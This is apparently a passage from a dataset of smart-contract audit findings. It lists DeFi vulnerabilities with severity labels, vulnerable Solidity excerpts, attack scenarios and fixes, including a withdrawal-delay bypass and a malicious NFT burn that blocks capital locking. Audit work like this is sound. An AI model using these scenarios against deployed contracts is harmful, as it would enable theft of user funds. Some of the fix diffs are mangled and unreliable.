ohmReceived - ohmMinted : 0;\\n```\\n -SingleSidedLiquidityVault._accumulateInternalRewards will revert with underflow error if rewardToken.lastRewardTime is bigger than current timeчmediumчSingleSidedLiquidityVault._accumulateInternalRewards will revert with underflow error if rewardToken.lastRewardTime is bigger than current time\\n```\\n function _accumulateInternalRewards() internal view returns (uint256[] memory) {\\n uint256 numInternalRewardTokens = internalRewardTokens.length;\\n uint256[] memory accumulatedInternalRewards = new uint256[](numInternalRewardTokens);\\n\\n\\n for (uint256 i; i < numInternalRewardTokens; ) {\\n InternalRewardToken memory rewardToken = internalRewardTokens[i];\\n\\n\\n uint256 totalRewards;\\n if (totalLP > 0) {\\n uint256 timeDiff = block.timestamp - rewardToken.lastRewardTime;\\n totalRewards = (timeDiff * rewardToken.rewardsPerSecond);\\n }\\n\\n\\n accumulatedInternalRewards[i] = totalRewards;\\n\\n\\n unchecked {\\n ++i;\\n }\\n }\\n\\n\\n return accumulatedInternalRewards;\\n }\\n```\\n\\nThe line is needed to see is this `uint256 timeDiff = block.timestamp - rewardToken.lastRewardTime`. In case if `rewardToken.lastRewardTime > block.timestamp` than function will revert and ddos functions that use it.\\n```\\n function addInternalRewardToken(\\n address token_,\\n uint256 rewardsPerSecond_,\\n uint256 startTimestamp_\\n ) external onlyRole(\"liquidityvault_admin\") {\\n InternalRewardToken memory newInternalRewardToken = InternalRewardToken({\\n token: token_,\\n decimalsAdjustment: 10**ERC20(token_).decimals(),\\n rewardsPerSecond: rewardsPerSecond_,\\n lastRewardTime: block.timestamp > startTimestamp_ ? block.timestamp : startTimestamp_,\\n accumulatedRewardsPerShare: 0\\n });\\n\\n\\n internalRewardTokens.push(newInternalRewardToken);\\n }\\n```\\n\\nIn case if `startTimestamp_` is in the future, then it will be set and cause that problem. lastRewardTime: block.timestamp > `startTimestamp_` ? block.timestamp : `startTimestamp_`.\\nNow till, `startTimestamp_` time, `_accumulateInternalRewards` will not work, so vault will be stopped. And of course, admin can remove that token and everything will be fine. That's why i think this is medium.чSkip token if it's `lastRewardTime` is in future.чSingleSidedLiquidityVault will be blockedч```\\n function _accumulateInternalRewards() internal view returns (uint256[] memory) {\\n uint256 numInternalRewardTokens = internalRewardTokens.length;\\n uint256[] memory accumulatedInternalRewards = new uint256[](numInternalRewardTokens);\\n\\n\\n for (uint256 i; i < numInternalRewardTokens; ) {\\n InternalRewardToken memory rewardToken = internalRewardTokens[i];\\n\\n\\n uint256 totalRewards;\\n if (totalLP > 0) {\\n uint256 timeDiff = block.timestamp - rewardToken.lastRewardTime;\\n totalRewards = (timeDiff * rewardToken.rewardsPerSecond);\\n }\\n\\n\\n accumulatedInternalRewards[i] = totalRewards;\\n\\n\\n unchecked {\\n ++i;\\n }\\n }\\n\\n\\n return accumulatedInternalRewards;\\n }\\n```\\n -claimFees may cause some external rewards to be locked in the contractчmediumчclaimFees will update rewardToken.lastBalance so that if there are unaccrued reward tokens in the contract, users will not be able to claim them.\\n_accumulateExternalRewards takes the difference between the contract's reward token balance and lastBalance as the reward. and the accumulated reward tokens are updated by _updateExternalRewardState.\\n```\\n function _accumulateExternalRewards() internal override returns (uint256[] memory) {\\n uint256 numExternalRewards = externalRewardTokens.length;\\n\\n auraPool.rewardsPool.getReward(address(this), true);\\n\\n uint256[] memory rewards = new uint256[](numExternalRewards);\\n for (uint256 i; i < numExternalRewards; ) {\\n ExternalRewardToken storage rewardToken = externalRewardTokens[i];\\n uint256 newBalance = ERC20(rewardToken.token).balanceOf(address(this));\\n\\n // This shouldn't happen but adding a sanity check in case\\n if (newBalance < rewardToken.lastBalance) {\\n emit LiquidityVault_ExternalAccumulationError(rewardToken.token);\\n continue;\\n }\\n\\n rewards[i] = newBalance - rewardToken.lastBalance;\\n rewardToken.lastBalance = newBalance;\\n\\n unchecked {\\n ++i;\\n }\\n }\\n return rewards;\\n }\\n// rest of code\\n function _updateExternalRewardState(uint256 id_, uint256 amountAccumulated_) internal {\\n // This correctly uses 1e18 because the LP tokens of all major DEXs have 18 decimals\\n if (totalLP != 0)\\n externalRewardTokens[id_].accumulatedRewardsPerShare +=\\n (amountAccumulated_ * 1e18) /\\n totalLP;\\n }\\n```\\n\\nauraPool.rewardsPool.getReward can be called by anyone to send the reward tokens to the contract\\n```\\n function getReward(address _account, bool _claimExtras) public updateReward(_account) returns(bool){\\n uint256 reward = earned(_account);\\n if (reward > 0) {\\n rewards[_account] = 0;\\n rewardToken.safeTransfer(_account, reward);\\n IDeposit(operator).rewardClaimed(pid, _account, reward);\\n emit RewardPaid(_account, reward);\\n }\\n\\n //also get rewards from linked rewards\\n if(_claimExtras){\\n for(uint i=0; i < extraRewards.length; i++){\\n IRewards(extraRewards[i]).getReward(_account);\\n }\\n }\\n return true;\\n }\\n```\\n\\nHowever, in claimFees, the rewardToken.lastBalance will be updated to the current contract balance after the admin has claimed the fees.\\n```\\n function claimFees() external onlyRole(\"liquidityvault_admin\") {\\n uint256 numInternalRewardTokens = internalRewardTokens.length;\\n uint256 numExternalRewardTokens = externalRewardTokens.length;\\n\\n for (uint256 i; i < numInternalRewardTokens; ) {\\n address rewardToken = internalRewardTokens[i].token;\\n uint256 feeToSend = accumulatedFees[rewardToken];\\n\\n accumulatedFees[rewardToken] = 0;\\n\\n ERC20(rewardToken).safeTransfer(msg.sender, feeToSend);\\n\\n unchecked {\\n ++i;\\n }\\n }\\n\\n for (uint256 i; i < numExternalRewardTokens; ) {\\n ExternalRewardToken storage rewardToken = externalRewardTokens[i];\\n uint256 feeToSend = accumulatedFees[rewardToken.token];\\n\\n accumulatedFees[rewardToken.token] = 0;\\n\\n ERC20(rewardToken.token).safeTransfer(msg.sender, feeToSend);\\n rewardToken.lastBalance = ERC20(rewardToken.token).balanceOf(address(this));\\n\\n unchecked {\\n ++i;\\n }\\n }\\n }\\n```\\n\\nConsider the following scenario.\\nStart with rewardToken.lastBalance = 200.\\nAfter some time, the rewardToken in aura is increased by 100.\\nSomeone calls getReward to claim the reward tokens to the contract, and the 100 reward tokens increased have not yet been accumulated via _accumulateExternalRewards and _updateExternalRewardState.\\nThe admin calls claimFees to update rewardToken.lastBalance to 290(10 as fees).\\nUsers call claimRewards and receives 0 reward tokens. 90 reward tokens will be locked in the contractчUse _accumulateExternalRewards and _updateExternalRewardState in claimFees to accrue rewards.\\n```\\n function claimFees() external onlyRole(\"liquidityvault_admin\") {\\n uint256 numInternalRewardTokens = internalRewardTokens.length;\\n uint256 numExternalRewardTokens = externalRewardTokens.length;\\n\\n for (uint256 i; i < numInternalRewardTokens; ) {\\n address rewardToken = internalRewardTokens[i].token;\\n uint256 feeToSend = accumulatedFees[rewardToken];\\n\\n accumulatedFees[rewardToken] = 0;\\n\\n ERC20(rewardToken).safeTransfer(msg.sender, feeToSend);\\n\\n unchecked {\\n // Add the line below\\n// Add the line below\\ni;\\n }\\n }\\n// Add the line below\\n uint256[] memory accumulatedExternalRewards = _accumulateExternalRewards();\\n for (uint256 i; i < numExternalRewardTokens; ) {\\n// Add the line below\\n _updateExternalRewardState(i, accumulatedExternalRewards[i]);\\n ExternalRewardToken storage rewardToken = externalRewardTokens[i];\\n uint256 feeToSend = accumulatedFees[rewardToken.token];\\n\\n accumulatedFees[rewardToken.token] = 0;\\n\\n ERC20(rewardToken.token).safeTransfer(msg.sender, feeToSend);\\n rewardToken.lastBalance = ERC20(rewardToken.token).balanceOf(address(this));\\n\\n unchecked {\\n // Add the line below\\n// Add the line below\\ni;\\n }\\n }\\n }\\n```\\nчIt will cause some external rewards to be locked in the contractч```\\n function _accumulateExternalRewards() internal override returns (uint256[] memory) {\\n uint256 numExternalRewards = externalRewardTokens.length;\\n\\n auraPool.rewardsPool.getReward(address(this), true);\\n\\n uint256[] memory rewards = new uint256[](numExternalRewards);\\n for (uint256 i; i < numExternalRewards; ) {\\n ExternalRewardToken storage rewardToken = externalRewardTokens[i];\\n uint256 newBalance = ERC20(rewardToken.token).balanceOf(address(this));\\n\\n // This shouldn't happen but adding a sanity check in case\\n if (newBalance < rewardToken.lastBalance) {\\n emit LiquidityVault_ExternalAccumulationError(rewardToken.token);\\n continue;\\n }\\n\\n rewards[i] = newBalance - rewardToken.lastBalance;\\n rewardToken.lastBalance = newBalance;\\n\\n unchecked {\\n ++i;\\n }\\n }\\n return rewards;\\n }\\n// rest of code\\n function _updateExternalRewardState(uint256 id_, uint256 amountAccumulated_) internal {\\n // This correctly uses 1e18 because the LP tokens of all major DEXs have 18 decimals\\n if (totalLP != 0)\\n externalRewardTokens[id_].accumulatedRewardsPerShare +=\\n (amountAccumulated_ * 1e18) /\\n totalLP;\\n }\\n```\\n -Protection sellers can bypass withdrawal delay mechanism and avoid losing funds when loans are defaulted by creating withdrawal request in each cycleчhighчTo prevent protection sellers from withdrawing fund immediately when protected lending pools are defaults, there is withdrawal delay mechanism, but it's possible to bypass it by creating withdraw request in each cycle by doing so user can withdraw in each cycle's open state. there is no penalty for users when they do this or there is no check to avoid this.\\nThis is `_requestWithdrawal()` code:\\n```\\n function _requestWithdrawal(uint256 _sTokenAmount) internal {\\n uint256 _sTokenBalance = balanceOf(msg.sender);\\n if (_sTokenAmount > _sTokenBalance) {\\n revert InsufficientSTokenBalance(msg.sender, _sTokenBalance);\\n }\\n\\n /// Get current cycle index for this pool\\n uint256 _currentCycleIndex = poolCycleManager.getCurrentCycleIndex(\\n address(this)\\n );\\n\\n /// Actual withdrawal is allowed in open period of cycle after next cycle\\n /// For example: if request is made in at some time in cycle 1,\\n /// then withdrawal is allowed in open period of cycle 3\\n uint256 _withdrawalCycleIndex = _currentCycleIndex + 2;\\n\\n WithdrawalCycleDetail storage withdrawalCycle = withdrawalCycleDetails[\\n _withdrawalCycleIndex\\n ];\\n\\n /// Cache existing requested amount for the cycle for the sender\\n uint256 _oldRequestAmount = withdrawalCycle.withdrawalRequests[msg.sender];\\n withdrawalCycle.withdrawalRequests[msg.sender] = _sTokenAmount;\\n\\n unchecked {\\n /// Update total requested withdrawal amount for the cycle considering existing requested amount\\n if (_oldRequestAmount > _sTokenAmount) {\\n withdrawalCycle.totalSTokenRequested -= (_oldRequestAmount -\\n _sTokenAmount);\\n } else {\\n withdrawalCycle.totalSTokenRequested += (_sTokenAmount -\\n _oldRequestAmount);\\n }\\n }\\n\\n emit WithdrawalRequested(msg.sender, _sTokenAmount, _withdrawalCycleIndex);\\n }\\n```\\n\\nAs you can see it doesn't keep track of user current withdrawal requests and user can request withdrawal for all of his balance in each cycle and by doing so user can set `withdrawalCycleDetails[Each Cycle][User]` to user's sToken balance. and whenever user wants to withdraw he only need to wait until the end of the current cycle while he should have waited until next cycle end.чTo avoid this code should keep track of user balance that is not in withdraw delay and user balance that are requested for withdraw. and to prevent users from requesting withdrawing and not doing it protocol should have some penalties for withdrawals, for example the waiting withdraw balance shouldn't get reward in waiting duration.чprotection sellers can request withdraw in each cycle for their full sToken balance and code would allow them to withdraw in each cycle end time because code doesn't track how much of the balance of users is requested for withdrawals in the past.ч```\\n function _requestWithdrawal(uint256 _sTokenAmount) internal {\\n uint256 _sTokenBalance = balanceOf(msg.sender);\\n if (_sTokenAmount > _sTokenBalance) {\\n revert InsufficientSTokenBalance(msg.sender, _sTokenBalance);\\n }\\n\\n /// Get current cycle index for this pool\\n uint256 _currentCycleIndex = poolCycleManager.getCurrentCycleIndex(\\n address(this)\\n );\\n\\n /// Actual withdrawal is allowed in open period of cycle after next cycle\\n /// For example: if request is made in at some time in cycle 1,\\n /// then withdrawal is allowed in open period of cycle 3\\n uint256 _withdrawalCycleIndex = _currentCycleIndex + 2;\\n\\n WithdrawalCycleDetail storage withdrawalCycle = withdrawalCycleDetails[\\n _withdrawalCycleIndex\\n ];\\n\\n /// Cache existing requested amount for the cycle for the sender\\n uint256 _oldRequestAmount = withdrawalCycle.withdrawalRequests[msg.sender];\\n withdrawalCycle.withdrawalRequests[msg.sender] = _sTokenAmount;\\n\\n unchecked {\\n /// Update total requested withdrawal amount for the cycle considering existing requested amount\\n if (_oldRequestAmount > _sTokenAmount) {\\n withdrawalCycle.totalSTokenRequested -= (_oldRequestAmount -\\n _sTokenAmount);\\n } else {\\n withdrawalCycle.totalSTokenRequested += (_sTokenAmount -\\n _oldRequestAmount);\\n }\\n }\\n\\n emit WithdrawalRequested(msg.sender, _sTokenAmount, _withdrawalCycleIndex);\\n }\\n```\\n -Lending pool state transition will be broken when pool is expired in late stateчhighчLending pool state transition will be broken when pool is expired in late state\\n```\\n function _getLendingPoolStatus(address _lendingPoolAddress)\\n internal\\n view\\n returns (LendingPoolStatus)\\n {\\n if (!_isReferenceLendingPoolAdded(_lendingPoolAddress)) {\\n return LendingPoolStatus.NotSupported;\\n }\\n\\n\\n ILendingProtocolAdapter _adapter = _getLendingProtocolAdapter(\\n _lendingPoolAddress\\n );\\n\\n\\n if (_adapter.isLendingPoolExpired(_lendingPoolAddress)) {\\n return LendingPoolStatus.Expired;\\n }\\n\\n\\n if (\\n _adapter.isLendingPoolLateWithinGracePeriod(\\n _lendingPoolAddress,\\n Constants.LATE_PAYMENT_GRACE_PERIOD_IN_DAYS\\n )\\n ) {\\n return LendingPoolStatus.LateWithinGracePeriod;\\n }\\n\\n\\n if (_adapter.isLendingPoolLate(_lendingPoolAddress)) {\\n return LendingPoolStatus.Late;\\n }\\n\\n\\n return LendingPoolStatus.Active;\\n }\\n```\\n\\nAs you can see, pool is expired if time of credit line has ended or loan is fully paid.\\nState transition for lending pool is done inside `DefaultStateManager._assessState` function. This function is responsible to lock capital, when state is late and unlock it when it's changed from late to active again.\\nBecause the first state that is checked is `expired` there can be few problems.\\nFirst problem. Suppose that lending pool is in late state. So capital is locked. There are 2 options now: payment was done, so pool becomes active and capital unlocked, payment was not done then pool has defaulted. But in case when state is late, and lending pool expired or loan is fully repaid(so it's also becomes expired), then capital will not be unlocked as there is no such transition Late -> Expired. The state will be changed to Expired and no more actions will be done. Also in this case it's not possible to detect if lending pool expired because of time or because no payment was done.\\nSecond problem. Lending pool is in active state. Last payment should be done some time before `_creditLine.termEndTime()`. Payment was not done, which means that state should be changed to Late and capital should be locked, but state was checked when loan has ended, so it became Expired and again there is no such transition that can detect that capital should be locked in this case. The state will be changed to Expired and no more actions will be done.чThese are tricky cases, think about transition for lending pool in such cases.чDepending on situation, capital can be locked forever or protection buyers will not be compensated.ч```\\n function _getLendingPoolStatus(address _lendingPoolAddress)\\n internal\\n view\\n returns (LendingPoolStatus)\\n {\\n if (!_isReferenceLendingPoolAdded(_lendingPoolAddress)) {\\n return LendingPoolStatus.NotSupported;\\n }\\n\\n\\n ILendingProtocolAdapter _adapter = _getLendingProtocolAdapter(\\n _lendingPoolAddress\\n );\\n\\n\\n if (_adapter.isLendingPoolExpired(_lendingPoolAddress)) {\\n return LendingPoolStatus.Expired;\\n }\\n\\n\\n if (\\n _adapter.isLendingPoolLateWithinGracePeriod(\\n _lendingPoolAddress,\\n Constants.LATE_PAYMENT_GRACE_PERIOD_IN_DAYS\\n )\\n ) {\\n return LendingPoolStatus.LateWithinGracePeriod;\\n }\\n\\n\\n if (_adapter.isLendingPoolLate(_lendingPoolAddress)) {\\n return LendingPoolStatus.Late;\\n }\\n\\n\\n return LendingPoolStatus.Active;\\n }\\n```\\n -Existing buyer who has been regularly renewing protection will be denied renewal even when she is well within the renewal grace periodчhighчExisting buyers have an opportunity to renew their protection within grace period. If lending state update happens from `Active` to `LateWithinGracePeriod` just 1 second after a buyer's protection expires, protocol denies buyer an opportunity even when she is well within the grace period.\\nSince defaults are not sudden and an `Active` loan first transitions into `LateWithinGracePeriod`, it is unfair to deny an existing buyer an opportunity to renew (its alright if a new protection buyer is DOSed). This is especially so because a late loan can become `active` again in future (or move to `default`, but both possibilities exist at this stage).\\nAll previous protection payments are a total loss for a buyer when she is denied a legitimate renewal request at the first sign of danger.\\n`renewProtection` first calls `verifyBuyerCanRenewProtection` that checks if the user requesting renewal holds same NFT id on same lending pool address & that the current request is within grace period defined by protocol.\\nOnce successfully verified, `renewProtection` calls `_verifyAndCreateProtection` to renew protection. This is the same function that gets called when a new protection is created.\\nNotice that this function calls `_verifyLendingPoolIsActive` as part of its verification before creating new protection - this check denies protection on loans that are in `LateWithinGracePeriod` or `Late` phase (see snippet below).\\n```\\nfunction _verifyLendingPoolIsActive(\\n IDefaultStateManager defaultStateManager,\\n address _protectionPoolAddress,\\n address _lendingPoolAddress\\n ) internal view {\\n LendingPoolStatus poolStatus = defaultStateManager.getLendingPoolStatus(\\n _protectionPoolAddress,\\n _lendingPoolAddress\\n );\\n\\n // rest of code\\n if (\\n poolStatus == LendingPoolStatus.LateWithinGracePeriod ||\\n poolStatus == LendingPoolStatus.Late\\n ) {\\n revert IProtectionPool.LendingPoolHasLatePayment(_lendingPoolAddress);\\n }\\n // rest of code\\n}\\n```\\nчWhen a user is calling `renewProtection`, a different implementation of `verifyLendingPoolIsActive` is needed that allows a user to renew even when lending pool status is `LateWithinGracePeriod` or `Late`.\\nRecommend using `verifyLendingPoolIsActiveForRenewal` function in renewal flow as shown below\\n```\\n function verifyLendingPoolIsActiveForRenewal(\\n IDefaultStateManager defaultStateManager,\\n address _protectionPoolAddress,\\n address _lendingPoolAddress\\n ) internal view {\\n LendingPoolStatus poolStatus = defaultStateManager.getLendingPoolStatus(\\n _protectionPoolAddress,\\n _lendingPoolAddress\\n );\\n\\n if (poolStatus == LendingPoolStatus.NotSupported) {\\n revert IProtectionPool.LendingPoolNotSupported(_lendingPoolAddress);\\n }\\n //------ audit - this section needs to be commented-----//\\n //if (\\n // poolStatus == LendingPoolStatus.LateWithinGracePeriod ||\\n // poolStatus == LendingPoolStatus.Late\\n //) {\\n // revert IProtectionPool.LendingPoolHasLatePayment(_lendingPoolAddress);\\n //}\\n // ---------------------------------------------------------//\\n\\n if (poolStatus == LendingPoolStatus.Expired) {\\n revert IProtectionPool.LendingPoolExpired(_lendingPoolAddress);\\n }\\n\\n if (poolStatus == LendingPoolStatus.Defaulted) {\\n revert IProtectionPool.LendingPoolDefaulted(_lendingPoolAddress);\\n }\\n }\\n```\\nчUser who has been regularly renewing protection and paying premium to protect against a future loss event will be denied that very protection when she most needs it.\\nIf existing user is denied renewal, she can never get back in (unless the lending pool becomes active again). All her previous payments were a total loss for her.ч```\\nfunction _verifyLendingPoolIsActive(\\n IDefaultStateManager defaultStateManager,\\n address _protectionPoolAddress,\\n address _lendingPoolAddress\\n ) internal view {\\n LendingPoolStatus poolStatus = defaultStateManager.getLendingPoolStatus(\\n _protectionPoolAddress,\\n _lendingPoolAddress\\n );\\n\\n // rest of code\\n if (\\n poolStatus == LendingPoolStatus.LateWithinGracePeriod ||\\n poolStatus == LendingPoolStatus.Late\\n ) {\\n revert IProtectionPool.LendingPoolHasLatePayment(_lendingPoolAddress);\\n }\\n // rest of code\\n}\\n```\\n -Malicious seller forced break lockCapital()чhighчMalicious burn nft causes failure to lockCapital() ,seller steady earn PremiumAmount, buyer will be lost compensation\\nWhen the status of the lendingPool changes from Active to Late, the protocol will call ProtectionPool.lockCapital() to lock amount lockCapital() will loop through the active protections to calculate the `lockedAmount`. The code is as follows:\\n```\\n function lockCapital(address _lendingPoolAddress)\\n external\\n payable\\n override\\n onlyDefaultStateManager\\n whenNotPaused\\n returns (uint256 _lockedAmount, uint256 _snapshotId)\\n {\\n// rest of code.\\n uint256 _length = activeProtectionIndexes.length();\\n for (uint256 i; i < _length; ) {\\n// rest of code\\n uint256 _remainingPrincipal = poolInfo\\n .referenceLendingPools\\n .calculateRemainingPrincipal( //<----------- calculate Remaining Principal\\n _lendingPoolAddress,\\n protectionInfo.buyer,\\n protectionInfo.purchaseParams.nftLpTokenId\\n );\\n```\\n\\nThe important thing inside is to calculate the _remainingPrincipal by `referenceLendingPools.calculateRemainingPrincipal()`\\n```\\n function calculateRemainingPrincipal(\\n address _lendingPoolAddress,\\n address _lender,\\n uint256 _nftLpTokenId\\n ) public view override returns (uint256 _principalRemaining) {\\n// rest of code\\n\\n if (_poolTokens.ownerOf(_nftLpTokenId) == _lender) { //<------------call ownerOf()\\n IPoolTokens.TokenInfo memory _tokenInfo = _poolTokens.getTokenInfo(\\n _nftLpTokenId\\n );\\n\\n// rest of code.\\n if (\\n _tokenInfo.pool == _lendingPoolAddress &&\\n _isJuniorTrancheId(_tokenInfo.tranche)\\n ) {\\n _principalRemaining =\\n _tokenInfo.principalAmount -\\n _tokenInfo.principalRedeemed;\\n }\\n }\\n }\\n```\\n\\nGoldfinchAdapter.calculateRemainingPrincipal() The current implementation will first determine if the ownerOf the NFTID is _lender\\nThere is a potential problem here, if the NFTID has been burned, the ownerOf() will be directly revert, which will lead to calculateRemainingPrincipal() revert,and lockCapital() revert and can't change status from active to late\\nLet's see whether Goldfinch's implementation supports burn(NFTID), and whether ownerOf(NFTID) will revert\\nPoolTokens has burn() method , if principalRedeemed==principalAmount you can burn it\\n```\\ncontract PoolTokens is IPoolTokens, ERC721PresetMinterPauserAutoIdUpgradeSafe, HasAdmin, IERC2981 {\\n// rest of code..\\n function burn(uint256 tokenId) external virtual override whenNotPaused {\\n TokenInfo memory token = _getTokenInfo(tokenId);\\n bool canBurn = _isApprovedOrOwner(_msgSender(), tokenId);\\n bool fromTokenPool = _validPool(_msgSender()) && token.pool == _msgSender();\\n address owner = ownerOf(tokenId);\\n require(canBurn || fromTokenPool, \"ERC721Burnable: caller cannot burn this token\");\\n require(token.principalRedeemed == token.principalAmount, \"Can only burn fully redeemed tokens\");\\n _destroyAndBurn(tokenId);\\n emit TokenBurned(owner, token.pool, tokenId);\\n }\\n```\\n\\n2.ownerOf() if nftid don't exists will revert with message \"ERC721: owner query for nonexistent token\"\\n```\\ncontract ERC721UpgradeSafe is\\n Initializable,\\n ContextUpgradeSafe,\\n ERC165UpgradeSafe,\\n IERC721,\\n IERC721Metadata,\\n IERC721Enumerable\\n{\\n// rest of code\\n function ownerOf(uint256 tokenId) public view override returns (address) {\\n return _tokenOwners.get(tokenId, \"ERC721: owner query for nonexistent token\");\\n }\\n```\\n\\nIf it can't changes to late, Won't lock the fund, seller steady earn PremiumAmount\\nSo there are two risks\\nnormal buyer gives NFTID to burn(), he does not know that it will affect all protection of the lendingPool\\nMalicious seller can buy a protection first, then burn it, so as to force all protection of the lendingPool to expire and get the PremiumAmount maliciously. buyer unable to obtain compensation\\nSuggested try catch for _poolTokens.ownerOf() If revert, it is assumed that the lender is not the ownerчtry catch for _poolTokens.ownerOf() If revert, it is assumed that the lender is not the ownerчbuyer will be lost compensationч```\\n function lockCapital(address _lendingPoolAddress)\\n external\\n payable\\n override\\n onlyDefaultStateManager\\n whenNotPaused\\n returns (uint256 _lockedAmount, uint256 _snapshotId)\\n {\\n// rest of code.\\n uint256 _length = activeProtectionIndexes.length();\\n for (uint256 i; i < _length; ) {\\n// rest of code\\n uint256 _remainingPrincipal = poolInfo\\n .referenceLendingPools\\n .calculateRemainingPrincipal( //<----------- calculate Remaining Principal\\n _lendingPoolAddress,\\n protectionInfo.buyer,\\n protectionInfo.purchaseParams.nftLpTokenId\\n );\\n```\\n -function lockCapital() doesn't filter the expired protections first and code may lock more funds than required and expired defaulted protections may fundedчmediumчwhen a lending loan defaults, then function `lockCapital()` get called in the ProtectionPool to lock required funds for the protections bought for that lending pool, but code doesn't filter the expired protections first and they may be expired protection in the active protection array that are not excluded and this would cause code to lock more fund and pay fund for expired defaulted protections and protection sellers would lose more funds.\\nThis `lockCapital()` code:\\n```\\n function lockCapital(address _lendingPoolAddress)\\n external\\n payable\\n override\\n onlyDefaultStateManager\\n whenNotPaused\\n returns (uint256 _lockedAmount, uint256 _snapshotId)\\n {\\n /// step 1: Capture protection pool's current investors by creating a snapshot of the token balance by using ERC20Snapshot in SToken\\n _snapshotId = _snapshot();\\n\\n /// step 2: calculate total capital to be locked\\n LendingPoolDetail storage lendingPoolDetail = lendingPoolDetails[\\n _lendingPoolAddress\\n ];\\n\\n /// Get indexes of active protection for a lending pool from the storage\\n EnumerableSetUpgradeable.UintSet\\n storage activeProtectionIndexes = lendingPoolDetail\\n .activeProtectionIndexes;\\n\\n /// Iterate all active protections and calculate total locked amount for this lending pool\\n /// 1. calculate remaining principal amount for each loan protection in the lending pool.\\n /// 2. for each loan protection, lockedAmt = min(protectionAmt, remainingPrincipal)\\n /// 3. total locked amount = sum of lockedAmt for all loan protections\\n uint256 _length = activeProtectionIndexes.length();\\n for (uint256 i; i < _length; ) {\\n /// Get protection info from the storage\\n uint256 _protectionIndex = activeProtectionIndexes.at(i);\\n ProtectionInfo storage protectionInfo = protectionInfos[_protectionIndex];\\n\\n /// Calculate remaining principal amount for a loan protection in the lending pool\\n uint256 _remainingPrincipal = poolInfo\\n .referenceLendingPools\\n .calculateRemainingPrincipal(\\n _lendingPoolAddress,\\n protectionInfo.buyer,\\n protectionInfo.purchaseParams.nftLpTokenId\\n );\\n\\n /// Locked amount is minimum of protection amount and remaining principal\\n uint256 _protectionAmount = protectionInfo\\n .purchaseParams\\n .protectionAmount;\\n uint256 _lockedAmountPerProtection = _protectionAmount <\\n _remainingPrincipal\\n ? _protectionAmount\\n : _remainingPrincipal;\\n\\n _lockedAmount += _lockedAmountPerProtection;\\n\\n unchecked {\\n ++i;\\n }\\n }\\n\\n unchecked {\\n /// step 3: Update total locked & available capital in storage\\n if (totalSTokenUnderlying < _lockedAmount) {\\n /// If totalSTokenUnderlying < _lockedAmount, then lock all available capital\\n _lockedAmount = totalSTokenUnderlying;\\n totalSTokenUnderlying = 0;\\n } else {\\n /// Reduce the total sToken underlying amount by the locked amount\\n totalSTokenUnderlying -= _lockedAmount;\\n }\\n }\\n }\\n```\\n\\nAs you can see code loops through active protection array for that lending pool and calculates required locked amount but it doesn't call `_accruePremiumAndExpireProtections()` to make sure active protections doesn't include any expired protections. if function `_accruePremiumAndExpireProtections()` doesn't get called for a while, then there would be possible that some of the protections are expired and they are still in the active protection array. This would cause code to calculated more locked amount and also pay fund for those expired defaulted protections too from protection sellers. (also when calculating the required token payment for the protection code doesn't check the expiration too in the other functions that are get called by the `lockCapital()`, the expire check doesn't exists in inner function too)чcall `_accruePremiumAndExpireProtections()` for the defaulted pool to filter out the expired protections.чsee summeryч```\\n function lockCapital(address _lendingPoolAddress)\\n external\\n payable\\n override\\n onlyDefaultStateManager\\n whenNotPaused\\n returns (uint256 _lockedAmount, uint256 _snapshotId)\\n {\\n /// step 1: Capture protection pool's current investors by creating a snapshot of the token balance by using ERC20Snapshot in SToken\\n _snapshotId = _snapshot();\\n\\n /// step 2: calculate total capital to be locked\\n LendingPoolDetail storage lendingPoolDetail = lendingPoolDetails[\\n _lendingPoolAddress\\n ];\\n\\n /// Get indexes of active protection for a lending pool from the storage\\n EnumerableSetUpgradeable.UintSet\\n storage activeProtectionIndexes = lendingPoolDetail\\n .activeProtectionIndexes;\\n\\n /// Iterate all active protections and calculate total locked amount for this lending pool\\n /// 1. calculate remaining principal amount for each loan protection in the lending pool.\\n /// 2. for each loan protection, lockedAmt = min(protectionAmt, remainingPrincipal)\\n /// 3. total locked amount = sum of lockedAmt for all loan protections\\n uint256 _length = activeProtectionIndexes.length();\\n for (uint256 i; i < _length; ) {\\n /// Get protection info from the storage\\n uint256 _protectionIndex = activeProtectionIndexes.at(i);\\n ProtectionInfo storage protectionInfo = protectionInfos[_protectionIndex];\\n\\n /// Calculate remaining principal amount for a loan protection in the lending pool\\n uint256 _remainingPrincipal = poolInfo\\n .referenceLendingPools\\n .calculateRemainingPrincipal(\\n _lendingPoolAddress,\\n protectionInfo.buyer,\\n protectionInfo.purchaseParams.nftLpTokenId\\n );\\n\\n /// Locked amount is minimum of protection amount and remaining principal\\n uint256 _protectionAmount = protectionInfo\\n .purchaseParams\\n .protectionAmount;\\n uint256 _lockedAmountPerProtection = _protectionAmount <\\n _remainingPrincipal\\n ? _protectionAmount\\n : _remainingPrincipal;\\n\\n _lockedAmount += _lockedAmountPerProtection;\\n\\n unchecked {\\n ++i;\\n }\\n }\\n\\n unchecked {\\n /// step 3: Update total locked & available capital in storage\\n if (totalSTokenUnderlying < _lockedAmount) {\\n /// If totalSTokenUnderlying < _lockedAmount, then lock all available capital\\n _lockedAmount = totalSTokenUnderlying;\\n totalSTokenUnderlying = 0;\\n } else {\\n /// Reduce the total sToken underlying amount by the locked amount\\n totalSTokenUnderlying -= _lockedAmount;\\n }\\n }\\n }\\n```\\n -If unlocked capital in pool falls below minRequiredCapital, then protection can be bought for minimum premiumчmediumчIf the unlocked capital in a pool falls below the minRequiredCapital, then protection can be bought for minimum premium\\nIn PremiumCalculator.calculatePremium, we see that if the risk factor \"cannot be calculated,\" it uses the minimum premium.\\n```\\n if (\\n RiskFactorCalculator.canCalculateRiskFactor(\\n _totalCapital,\\n _leverageRatio,\\n _poolParameters.leverageRatioFloor,\\n _poolParameters.leverageRatioCeiling,\\n _poolParameters.minRequiredCapital\\n )\\n ) {\\n // rest of code\\n } else {\\n /// This means that the risk factor cannot be calculated because of either\\n /// min capital not met or leverage ratio out of range.\\n /// Hence, the premium is the minimum premium\\n _isMinPremium = true;\\n }\\n```\\n\\nIn RiskFactor.canCalculateRiskFactor, we see there are three conditions when this is so:\\n```\\n function canCalculateRiskFactor(\\n uint256 _totalCapital,\\n uint256 _leverageRatio,\\n uint256 _leverageRatioFloor,\\n uint256 _leverageRatioCeiling,\\n uint256 _minRequiredCapital\\n ) external pure returns (bool _canCalculate) {\\n if (\\n _totalCapital < _minRequiredCapital ||\\n _leverageRatio < _leverageRatioFloor ||\\n _leverageRatio > _leverageRatioCeiling\\n ) {\\n _canCalculate = false;\\n } else {\\n _canCalculate = true;\\n }\\n }\\n}\\n```\\n\\nIf the leverage ratio is above the ceiling, then protection should be very cheap, and it is correct to use the minimum premium. If the leverage 